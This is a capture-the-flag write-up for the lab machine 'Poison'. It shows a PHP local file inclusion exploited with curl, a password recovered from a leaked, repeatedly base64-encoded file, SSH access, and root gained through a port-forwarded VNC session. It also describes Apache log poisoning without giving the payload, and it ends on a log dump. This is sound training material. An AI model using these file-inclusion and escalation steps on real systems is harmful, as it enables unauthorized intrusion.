Poison

1 Ports scan
2 Web enumeration
3 Decode password
4 User Flag
5 Privileges escalation
6 Intended way
7 References

Ports scan

u505@naos:~/HTB/Machines/Poison$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.84
Starting masscan 1.3.1 at 2021-01-29 15:22:16 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.10.84
Discovered open port 22/tcp on 10.10.10.84

u505@naos:~/HTB/Machines/Poison$ nmap -sC -sV poison
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-28 16:11 EST
Nmap scan report for poison (10.10.10.84)
Host is up (0.037s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey:
|   2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
|   256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
|_  256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd


Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.27 seconds

Web enumeration

The first page shows a php form.

If we pass a script name in the form.

It executes the script name.

The index page is a simple GET form. An the input is a filename.

u505@naos:~/HTB/Machines/Poison$ curl http://poison.htb
<html>
 <body>
 <h1>Temporary website to test local .php scripts.</h1>
 Sites to be tested: ini.php, info.php, listfiles.php, phpinfo.php
 <br>
 </body>
 </html>
 <br>
 <form action="/browse.php" method="GET">
        Scriptname: <input type="text" name="file">

        <input type="submit" value="Submit">
</form>

Filtering the source code of the script browse.php in base 64, we see the page includes the requested file without any control.

u505@naos:~/HTB/Machines/Poison$ curl -s http://poison.htb/browse.php?file=php://filter/convert.base64-encode/resource=browse.php | base64 -d
<?php
include($_GET['file']);
?>

The script listfiles.php provide a list of files.

u505@naos:~/HTB/Machines/Poison$ curl http://poison.htb/browse.php?file=listfiles.php
Array
(
    [0] => .
    [1] => ..
    [2] => browse.php
    [3] => index.php
    [4] => info.php
    [5] => ini.php
    [6] => listfiles.php
    [7] => phpinfo.php
    [8] => pwdbackup.txt
)

The content of the file pwdbackup.txt seems to be a base64 file. The text suggests that it is encoded several times.

u505@naos:~/HTB/Machines/Poison$ curl http://poison.htb/browse.php?file=pwdbackup.txt
This password is secure, it's encoded atleast 13 times.. what could go wrong really..


Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU
bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS
bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW
M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs
WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy
eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G
WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw
MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa
T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k
WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk
WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0
NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT
Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz
WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW
VmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpO
Ukd4RVdub3dPVU5uUFQwSwo=

Decode password

u505@naos:~/HTB/Machines/Poison$ cat pwdbackup.txt | tail -n 16 > pwdbackup

This script decodes the text in base 64 in a loop.

u505@naos:~/HTB/Machines/Poison$ cat decode.sh
endoded=`cat pwdbackup | tr -d '\n'`
i=0
while :
do
        i=`expr $i + 1`
        echo "--------------- Decode number $i -------------------"
        decoded=`echo -n $endoded | base64 -d | tr -d '\n'`
        echo $decoded
        read abc
        endoded=$decoded
done

The execution decodes the text from base64 until we have a clear text after 13 times.

u505@naos:~/HTB/Machines/Poison$ sh decode.sh
--------------- Decode number 1 -------------------
Vm0wd2QyUXlVWGxXYTFwUFZsZFNjRlZ0TVZOWFJsbDNXa2M1VjJKR2JETlhhMUpUVmpGYWMySkVUbGhoTVVwVVZtcEdTMlJIVmtkWApiRnBPWVd0RmVGWnRjRXRUTVU1SVZtdFdVZ3BpVlZwWVZtMTRjMDB4WkZkYVJGSlVUV3N4TkZkcmFGZGhVWEJUWWxaS1VGZFhNVFJTCk1EQjRWMjVTYTFKc2NITlZiWGh6VGxaYVNHUklUbWhWV0VKVVdXeGFTMlF4V25Sa1IwWmFDbFpzV2xoWGExcHJXVlpLUjFOdFJsZGgKYTBZMFZHdGFZVk5GTlZkYVIyaFdWMFZLVlZkWGVHRlRNVnBYVjJ0a1ZtRXpVbkJEYXpGeVlrUlNWMDFxVmt4V01uTjNaVmRHUjFWcwpjR2tLVW01Q2IxZHNaRFJXTWxKR1RsWmtZVkl5YUZOV01GWkxWbFprV0dWSGRHbE5iRXA2VjJ0YWExWnRSWHBWYms1RVlsVndXRll5CmRHOVdNREZ4Vm10NFdGWnNjRXhWYWtaUFl6Rldjd3BXYkdOTFdXdG9RbVZzV25SalJXUldUVlpzTkZZeU5VOVpWa2w1WVVaa1YwMUcKV2t4V2JGcGhaRVV4VlZGdGRFNWhNbmN3VmpKMGIxUXhiRmRVYTJoV1lrVTFSVmxzVmxwTmJGcDBDbVZIT1ZkaVZYQkpXVlZvZDFZdwpNWEZTYkdoaFVsZFNXRlZxUms5amQzQmhVbTFPVEZkWGVGWmtNbEY0VjJ0V1UySkhVbFpVVjNSM1pXeFdXR1ZHWkZWaVJYQmFWa2QwCk5GSkdjRFlLVFVSc1JGcDZNRGxEWnowOUNnPT0K


--------------- Decode number 2 -------------------
Vm0wd2QyUXlWa1pPVldScFVtMVNXRll3Wkc5V2JGbDNXa1JTVjFac2JETlhhMUpUVmpGS2RHVkdXbFpOYWtFeFZtcEtTMU5IVmtWUgpiVVpYVm14c00xZFdaRFJUTWsxNFdraFdhUXBTYlZKUFdXMTRSMDB4V25Sa1JscHNVbXhzTlZaSGRITmhVWEJUWWxaS2QxWnRkR0ZaClZsWlhXa1prWVZKR1NtRldha0Y0VGtaYVNFNVdaR2hWV0VKVVdXeGFTMVpXV2tkVmEzUnBDazFyYkRSV01qVkxWMnN3ZVdGR1VscGkKUm5Cb1dsZDRWMlJGTlZkYVIyaFNWMFZLVlZkWGVHdGlNbEp6V2taa1ZtRXpVbk5EYlVwWFYydG9WMDFxVmt4WFZscExVakZPYzFWcwpWbGNLWWtoQmVsWnRjRWRWTVZsNFYyNU9ZVkl5YUZkV01GWkxWbFphZEUxVVFtdE5hMncwVjJ0b1QxbFdUa2hWYkU1RVlsVlpNbFp0CmVHOVdiVXBJWVVod1YwMXFSbGhhUldSWFVqRk9jd3BhUm1OTFdXeFZkMlF4V2tWU2JHUlZUV3R3ZWxWWGVGZFViRXBaVkd0NFJGcDYKTURsRFp6MDlDZz09Cg==


--------------- Decode number 3 -------------------
Vm0wd2QyVkZOVWRpUm1SWFYwZG9WbFl3WkRSV1ZsbDNXa1JTVjFKdGVGWlZNakExVmpKS1NHVkVRbUZXVmxsM1dWZDRTMk14WkhWaQpSbVJPWW14R00xWnRkRlpsUmxsNVZHdHNhUXBTYlZKd1ZtdGFZVlZXWkZkYVJGSmFWakF4TkZaSE5WZGhVWEJUWWxaS1ZWWkdVa3RpCk1rbDRWMjVLV2sweWFGUlpiRnBoWld4V2RFNVdaR2hSV0VKVVdXeGtiMlJzWkZkVmEzUnNDbUpXV2toV01qVkxXVlpLUjFOc1VsVlcKYkhBelZtcEdVMVl4V25OYVIyaFdWMFZLVlZadE1UQmtNa2w0V2toT1lWTkhVbE5EYlVZMlZteG9WbUpIYUhwV01qRlhaRWRXUjFOcwpaRmNLWWxVd2QxWkVSbGRVTWtwelVXeFdUbEpZVGt4RFp6MDlDZz09Cg==


--------------- Decode number 4 -------------------
Vm0wd2VFNUdiRmRXV0doVlYwZDRWVll3WkRSV1JteFZVMjA1VjJKSGVEQmFWVll3WVd4S2MxZHViRmROYmxGM1ZtdFZlRll5VGtsaQpSbVJwVmtaYVVWZFdaRFJaVjAxNFZHNVdhUXBTYlZKVVZGUktiMkl4V25KWk0yaFRZbFphZWxWdE5WZGhRWEJUWWxkb2RsZFdVa3RsCmJWWkhWMjVLWVZKR1NsUlVWbHAzVmpGU1YxWnNaR2hWV0VKVVZtMTBkMkl4WkhOYVNHUlNDbUY2VmxoVmJHaHpWMjFXZEdWR1NsZFcKYlUwd1ZERldUMkpzUWxWTlJYTkxDZz09Cg==


--------------- Decode number 5 -------------------
Vm0weE5GbFdWWGhVV0d4VVYwZDRWRmxVU205V2JHeDBaVVYwYWxKc1dubFdNblF3VmtVeFYyTkliRmRpVkZaUVdWZDRZV014VG5WaQpSbVJUVFRKb2IxWnJZM2hTYlZaelVtNVdhQXBTYldodldWUktlbVZHV25KYVJGSlRUVlp3VjFSV1ZsZGhVWEJUVm10d2IxZHNaSGRSCmF6VlhVbGhzV21WdGVGSldWbU0wVDFWT2JsQlVNRXNLCg==


--------------- Decode number 6 -------------------
Vm0xNFlWVXhUWGxUV0d4VFlUSm9WbGx0ZUV0alJsWnlWMnQwVkUxV2NIbFdiVFZQWVd4YWMxTnViRmRTTTJob1ZrY3hSbVZzUm5WaApSbWhvWVRKemVGWnJaRFJTTVZwV1RWVldhUXBTVmtwb1dsZHdRazVXUlhsWmVteFJWVmM0T1VOblBUMEsK


--------------- Decode number 7 -------------------
Vm14YVUxTXlTWGxTYTJoVllteEtjRlZyV2t0VE1WcHlWbTVPYWxac1NubFdSM2hoVkcxRmVsRnVhRmhoYTJzeFZrZDRSMVpWTVVWaQpSVkpoWldwQk5WRXlZemxRVVc4OUNnPT0K


--------------- Decode number 8 -------------------
VmxaU1MySXlSa2hVYmxKcFVrWktTMVpyVm5OalZsSnlWR3hhVG1FelFuaFhha2sxVkd4R1ZVMUViRVJhZWpBNVEyYzlQUW89Cg==


--------------- Decode number 9 -------------------
VlZSS2IyRkhUblJpUkZKS1ZrVnNjVlJyVGxaTmEzQnhXakk1VGxGVU1EbERaejA5Q2c9PQo=


--------------- Decode number 10 -------------------
VVRKb2FHTnRiRFJKVkVscVRrTlZNa3BxWjI5TlFUMDlDZz09Cg==


--------------- Decode number 11 -------------------
UTJoaGNtbDRJVElqTkNVMkpqZ29NQT09Cg==


--------------- Decode number 12 -------------------
Q2hhcml4ITIjNCU2JjgoMA==


--------------- Decode number 13 -------------------
Charix!2#4%6&8(0
^C

User Flag

Take a look at system users.

u505@naos:~/HTB/Machines/Poison$ curl http://poison.htb/browse.php?file=/etc/passwd
# $FreeBSD: releng/11.1/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
unbound:*:59:59:Unbound DNS Resolver:/var/unbound:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
auditdistd:*:78:77:Auditdistd unprivileged user:/var/empty:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
_ypldap:*:160:160:YP LDAP unprivileged user:/var/empty:/usr/sbin/nologin
hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
_tss:*:601:601:TrouSerS user:/var/empty:/usr/sbin/nologin
messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/usr/sbin/nologin
avahi:*:558:558:Avahi Daemon User:/nonexistent:/usr/sbin/nologin
cups:*:193:193:Cups Owner:/nonexistent:/usr/sbin/nologin
charix:*:1001:1001:charix:/home/charix:/bin/csh

The user charix and the password works.

u505@naos:~/HTB/Machines/Poison$ ssh charix@poison
Password for charix@Poison:
Last login: Mon Mar 19 16:38:00 2018 from 10.10.14.4
FreeBSD 11.1-RELEASE (GENERIC) #0 r321309: Fri Jul 21 02:08:28 UTC 2017


Welcome to FreeBSD!


Release Notes, Errata: https://www.FreeBSD.org/releases/
Security Advisories:   https://www.FreeBSD.org/security/
FreeBSD Handbook:      https://www.FreeBSD.org/handbook/
FreeBSD FAQ:           https://www.FreeBSD.org/faq/
Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/
FreeBSD Forums:        https://forums.FreeBSD.org/


Documents installed with the system are in the /usr/local/share/doc/freebsd/
directory, or can be installed later with:  pkg install en-freebsd-doc
For other languages, replace "en" with a language code like de or fr.


Show the version of FreeBSD installed:  freebsd-version ; uname -a
Please include that output and any error messages when posting questions.
Introduction to manual pages:  man man
FreeBSD directory layout:      man hier


Edit /etc/motd to change this login announcement.
"man firewall" will give advice for building a FreeBSD firewall
                -- David Scheidt <dscheidt@tumbolia.com>
charix@Poison:~ % whoami
charix
charix@Poison:~ % cat user.txt
<USER_FLAG>

Privileges escalation

In the user folder, there is zip file.

charix@Poison:~ % ls -l
total 8
-rw-r-----  1 root  charix  166 Mar 19  2018 secret.zip
-rw-r-----  1 root  charix   33 Mar 19  2018 user.txt

Download of the file.

u505@naos:~/HTB/Machines/Poison$ scp charix@poison:/home/charix/secret.zip ./
Password for charix@Poison:
secret.zip                                    100%  166     4.2KB/s   00:00

The zip file is encrypted. The key is the user password.

u505@naos:~/HTB/Machines/Poison$ unzip secret.zip
Archive:  secret.zip
[secret.zip] secret password:
 extracting: secret

The file is a binary file.

u505@naos:~/HTB/Machines/Poison$ xxd secret
00000000: bda8 5b7c d596 7a21                      ..[|..z!

There is a VNC server listening.

charix@Poison:~ % ps -al
 UID PID PPID CPU PRI NI   VSZ  RSS MWCHAN STAT TT     TIME COMMAND
   0 529    1   0  20  0 23620 8872 select I    v0- 0:00.02 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geometry 1280x800 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/passwd -rfbport 5901 -local
   0 540    1   0  36  0 67220 7064 select I    v0- 0:00.02 xterm -geometry 80x24+10+10 -ls -title X Desktop
   0 541    1   0  26  0 37620 5312 select I    v0- 0:00.01 twm
   0 696    1   0  52  0 10484 2076 ttyin  Is+  v0  0:00.00 /usr/libexec/getty Pc ttyv0
   0 697    1   0  52  0 10484 2076 ttyin  Is+  v1  0:00.00 /usr/libexec/getty Pc ttyv1
   0 698    1   0  52  0 10484 2076 ttyin  Is+  v2  0:00.00 /usr/libexec/getty Pc ttyv2
   0 699    1   0  52  0 10484 2076 ttyin  Is+  v3  0:00.00 /usr/libexec/getty Pc ttyv3
   0 700    1   0  52  0 10484 2076 ttyin  Is+  v4  0:00.00 /usr/libexec/getty Pc ttyv4
   0 701    1   0  52  0 10484 2076 ttyin  Is+  v5  0:00.00 /usr/libexec/getty Pc ttyv5
   0 702    1   0  52  0 10484 2076 ttyin  Is+  v6  0:00.00 /usr/libexec/getty Pc ttyv6
   0 703    1   0  52  0 10484 2076 ttyin  Is+  v7  0:00.00 /usr/libexec/getty Pc ttyv7
   0 560  540   0  52  0 19660 3616 ttyin  Is+   0  0:00.01 -csh (csh)
1001 759  758   0  20  0 19660 3652 pause  Ss    1  0:00.02 -csh (csh)
1001 810  759   0  20  0 21208 2652 -      R+    1  0:00.00 ps -al

Netstat confirms that VNC is listening in local port 5901.

root@Poison:~ # netstat -an | grep LISTEN
tcp4       0      0 127.0.0.1.25           *.*                    LISTEN
tcp4       0      0 *.80                   *.*                    LISTEN
tcp6       0      0 *.80                   *.*                    LISTEN
tcp4       0      0 *.22                   *.*                    LISTEN
tcp6       0      0 *.22                   *.*                    LISTEN
tcp4       0      0 127.0.0.1.5801         *.*                    LISTEN
tcp4       0      0 127.0.0.1.5901         *.*                    LISTEN

Open an ssh session with port forwarding on port 5901.

u505@naos:~/HTB/Machines/Poison$ ssh -L 5901:127.0.0.1:5901 charix@poison
Password for charix@Poison:
Last login: Thu Jan 28 22:49:01 2021 from 10.10.14.14
FreeBSD 11.1-RELEASE (GENERIC) #0 r321309: Fri Jul 21 02:08:28 UTC 2017


Welcome to FreeBSD!


Release Notes, Errata: https://www.FreeBSD.org/releases/
Security Advisories:   https://www.FreeBSD.org/security/
FreeBSD Handbook:      https://www.FreeBSD.org/handbook/
FreeBSD FAQ:           https://www.FreeBSD.org/faq/
Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/
FreeBSD Forums:        https://forums.FreeBSD.org/


Documents installed with the system are in the /usr/local/share/doc/freebsd/
directory, or can be installed later with:  pkg install en-freebsd-doc
For other languages, replace "en" with a language code like de or fr.


Show the version of FreeBSD installed:  freebsd-version ; uname -a
Please include that output and any error messages when posting questions.
Introduction to manual pages:  man man
FreeBSD directory layout:      man hier


Edit /etc/motd to change this login announcement.
In order to search for a string in some files, use 'grep' like this:


         grep "string" filename1 [filename2 filename3 ...]


This will print out the lines in the files that contain the string.  grep can
also do a lot more advanced searches - type 'man grep' for details.

Check that our localport 5901 is forwarded to port 5901 on the remote machine.

u505@naos:~/HTB/Machines/Poison$ telnet 127.0.0.1 5901
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
RFB 003.008
quit
sadasd
Connection closed by foreign host.

Open a VNC session in our box with the password file provided previously.

u505@naos:~/HTB/Machines/Poison$ export DISPLAY=:10.0
u505@naos:~/HTB/Machines/Poison$ vncviewer 127.0.0.1:5901 -passwd secret
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
Performing standard VNC authentication
Authentication successful
Desktop name "root's X desktop (Poison:1)"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding

Intended way

Finding the pwdbackup.txt so quickly resolves the machine, but I missed the point of the box. The intended way is to gain a reverse shell poisoning the apache log files. Once the reverse shell obtained, the file pwdbackup.txt, and the machines is resolved as previously explained.

Log file location

If we try an unknown file. It discloses the DocRoot folder.

u505@naos:~/HTB/Machines/Poison$ curl http://poison.htb/browse.php?file=u505

 Warning:  include(u505): failed to open stream: No such file or directory in /usr/local/www/apache24/data/browse.php on line 2



Warning:  include(): Failed opening 'u505' for inclusion (include_path='.:/usr/local/www/apache24/data') in /usr/local/www/apache24/data/browse.php on line 2

After a few tries and fails, we can find the httpd.conf file.

u505@naos:~/HTB/Machines/Poison$ curl -s http://poison.htb/browse.php?file=/usr/local/etc/apache24/httpd.conf | grep Log
# ErrorLog: The location of the error log file.
# If you do not specify an ErrorLog directive within a <VirtualHost>
ErrorLog "/var/log/httpd-error.log"
# LogLevel: Control the number of messages logged to the error_log.
LogLevel warn
    # a CustomLog directive (see below).
    LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined
    LogFormat "%h %l %u %t \"%r\" %>s %b" common
      LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %I %O" combinedio
    # The location and format of the access logfile (Common Logfile Format).
    #CustomLog "/var/log/httpd-access.log" common
    # (Combined Logfile Format) you can use the following directive.
    CustomLog "/var/log/httpd-access.log" combined

The log file is stored in /var/log/httpd-access.log and the User-Agent is logged. And we can read the log file.

u505@naos:~/HTB/Machines/Poison$ curl -s http://poison.htb/browse.php?file=/var/log/httpd-access.log


192.168.253.133 - - [24/Jan/2018:18:33:25 +0100] "GET / HTTP/1.1" 200 289 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
10.10.14.4 - - [19/Mar/2018:13:28:50 +0100] "GET / HTTP/1.0" 200 289 "-" "-"
10.10.14.4 - - [19/Mar/2018:13:28:50 +0100] "GET / HTTP/1.0" 200 289 "-" "-"
10.10.14.4 - - [19/Mar/2018:13:28:50 +0100] "POST /sdk HTTP/1.1" 404 201 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.10.14.4 - - [19/Mar/2018:13:28:50 +0100] "GET /nmaplowercheck1521462526 HTTP/1.1" 404 222 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.10.14.4 - - [19/Mar/2018:13:28:50 +0100] "GET / HTTP/1.1" 200 289 "-" "-"
10.10.14.4 - - [19/Mar/2018:13:28:50 +0100] "GET /HNAP1 HTTP/1.1" 404 203 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.10.14.2 - - [31/Jan/2021:12:36:00 +0100] "GET / HTTP/1.1" 200 289 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0"
10.10.14.2 - - [31/Jan/2021:12:36:11 +0100] "GET /browse.php?file=phpinfo.php HTTP/1.1" 200 69953 "http://poison.htb/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0"
10.10.14.2 - - [31/Jan/2021:12:54:39 +0100] "GET / HTTP/1.1" 200 289 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:12:54:50 +0100] "GET /browse.php?file=listfiles.php HTTP/1.1" 200 192 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:12:56:16 +0100] "GET /browse.php?file=php://filter/convert.base64-encode/resource=browse.php HTTP/1.1" 200 44 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:12:56:28 +0100] "GET /browse.php?file=php://filter/convert.base64-encode/resource=browse.php HTTP/1.1" 200 44 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:13:12:57 +0100] "GET /browse.php?file=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 388 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:13:13:54 +0100] "GET /browse.php?file=php://filter/convert.base64-encode/resource=listfiles.php HTTP/1.1" 200 120 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:38:15 +0100] "GET /browse.php?file=u505 HTTP/1.1" 200 353 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:41:06 +0100] "GET /browse.php?dsadasasd HTTP/1.1" 200 321 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:41:25 +0100] "GET /browse.php?file=u505 HTTP/1.1" 200 353 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:41:41 +0100] "GET /browse.php?file=/usr/local/www/apache24/httpd.conf HTTP/1.1" 200 413 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:42:27 +0100] "GET /browse.php?file=/usr/local/www/apache24/httpd.conf HTTP/1.1" 200 413 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:47:09 +0100] "GET /browse.php?file=/usr/local/www/apache24/httpd.conf HTTP/1.1" 200 413 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:47:17 +0100] "GET /browse.php?file=/usr/local/etc/apache24/httpd.conf HTTP/1.1" 200 21199 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:47:48 +0100] "GET /browse.php?file=/usr/local/etc/apache24/httpd.conf HTTP/1.1" 200 21199 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:47:52 +0100] "GET /browse.php?file=/usr/local/etc/apache24/httpd.conf HTTP/1.1" 200 21199 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:48:22 +0100] "GET /browse.php?file=u505 HTTP/1.1" 200 353 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:48:44 +0100] "GET /browse.php?file=/usr/local/www/apache24/httpd.conf HTTP/1.1" 200 413 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:49:02 +0100] "GET /browse.php?file=/usr/local/etc/apache24/httpd.conf HTTP/1.1" 200 21199 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:49:21 +0100] "GET /browse.php?file=/usr/local/etc/apache24/httpd.conf HTTP/1.1" 200 21199 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:49:53 +0100] "GET /browse.php?file=/var/log/httpd-error.log HTTP/1.1" 200 5002 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:50:02 +0100] "GET /browse.php?file=/var/log/httpd-error.log HTTP/1.1" 200 5002 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:50:20 +0100] "GET /browse.php?file=/var/log/httpd-access.log HTTP/1.1" 200 3991 "-" "curl/7.74.0"

Log file poisoning

Tampering the HTTP request, allows us to modify the User-Agent to execute a shell command.

Now if we see the log file, we see a warning message.

u505@naos:~/HTB/Machines/Poison$ curl -s http://poison.htb/browse.php?file=/var/log/httpd-access.log


192.168.253.133 - - [24/Jan/2018:18:33:25 +0100] "GET / HTTP/1.1" 200 289 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
10.10.14.4 - - [19/Mar/2018:13:28:50 +0100] "GET / HTTP/1.0" 200 289 "-" "-"
10.10.14.4 - - [19/Mar/2018:13:28:50 +0100] "GET / HTTP/1.0" 200 289 "-" "-"
10.10.14.4 - - [19/Mar/2018:13:28:50 +0100] "POST /sdk HTTP/1.1" 404 201 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.10.14.4 - - [19/Mar/2018:13:28:50 +0100] "GET /nmaplowercheck1521462526 HTTP/1.1" 404 222 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.10.14.4 - - [19/Mar/2018:13:28:50 +0100] "GET / HTTP/1.1" 200 289 "-" "-"
10.10.14.4 - - [19/Mar/2018:13:28:50 +0100] "GET /HNAP1 HTTP/1.1" 404 203 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.10.14.2 - - [31/Jan/2021:12:36:00 +0100] "GET / HTTP/1.1" 200 289 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0"
10.10.14.2 - - [31/Jan/2021:12:36:11 +0100] "GET /browse.php?file=phpinfo.php HTTP/1.1" 200 69953 "http://poison.htb/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0"
10.10.14.2 - - [31/Jan/2021:12:54:39 +0100] "GET / HTTP/1.1" 200 289 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:12:54:50 +0100] "GET /browse.php?file=listfiles.php HTTP/1.1" 200 192 "-" "curl/7.74.0"
